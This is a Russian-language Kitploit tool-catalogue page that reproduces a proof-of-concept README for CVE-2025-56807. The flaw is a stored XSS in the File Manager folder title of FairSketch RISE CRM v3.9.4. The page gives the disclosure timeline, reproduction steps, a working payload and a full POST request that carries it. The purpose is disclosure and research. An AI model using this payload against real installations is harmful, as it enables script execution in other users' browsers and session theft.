Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-56807 — Proof-of-concept для хранимой XSS-уязвимости в FairSketch RISE Ultimate Project Manager & CRM v3.9.4, демонстрирующий произвольное выполнение JavaScript через внедрение в заголовок папки. | Kitploit
Инструменты/GitHubGitHub/aqwainfosec/cve-2025-56807
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

Proof-of-concept для хранимой XSS-уязвимости в FairSketch RISE Ultimate Project Manager & CRM v3.9.4, демонстрирующий произвольное выполнение JavaScript через внедрение в заголовок папки.

Репозиторий
11 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-56807

Описание

Обнаружена уязвимость Stored Cross Site Scripting (XSS) в FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) в функциональности File Manager. Уязвимость находится в параметре title, который отправляется при создании новых папок. Из-за недостаточной санитизации ввода злоумышленник может внедрить HTML/JavaScript полезные нагрузки (например: <details/open/ontoggle=prompt(origin)>). Полезная нагрузка сохраняется в имени папки и выполняется при отображении списка папок в File Manager, что позволяет выполнить произвольный JavaScript в браузере любого пользователя, просматривающего соответствующую папку. Это может привести к угону сессии и краже данных.

[!NOTE]
Эта уязвимость не является исключительной для учетных записей администратора. Она может быть использована любой учетной записью пользователя, имеющего разрешение на создание новых папок в File Manager.

График раскрытия

  • Назначенный идентификатор CVE: CVE-2025-56807
  • Обнаружение: Июль 2025 (Aqwa Hameed)
  • Уведомление поставщика: отправлено электронное письмо в службу поддержки Fairsketch
  • Ответ: подтверждено поставщиком 22 июля 2025 года

Доказательство концепции (PoC)

  • Войдите с действительными учетными данными.

  • Перейдите в Files

    Dashboard

  • Нажмите New Folder

    File Manager

  • Введите указанную ниже полезную нагрузку в поле Title:

  • root@kitploit:~
    <details/open/ontoggle=prompt(origin)>
    

    Folder Title

    1. Перезагрузите страницу File Manager, чтобы активировать полезную нагрузку

      Payload Execution

    Запрос

    root@kitploit:~
    POST /index.php/clients/save_folder HTTP/1.1
    Host: rise.fairsketch.com
    Cookie: [redacted]
    Content-Length: 99
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
    Sec-Ch-Ua-Mobile: ?0
    X-Requested-With: XMLHttpRequest
    User-Agent: [redacted]
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: https://rise.fairsketch.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Priority: u=1, i
    Connection: keep-alive
    
    id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
    
    Скачать инструмент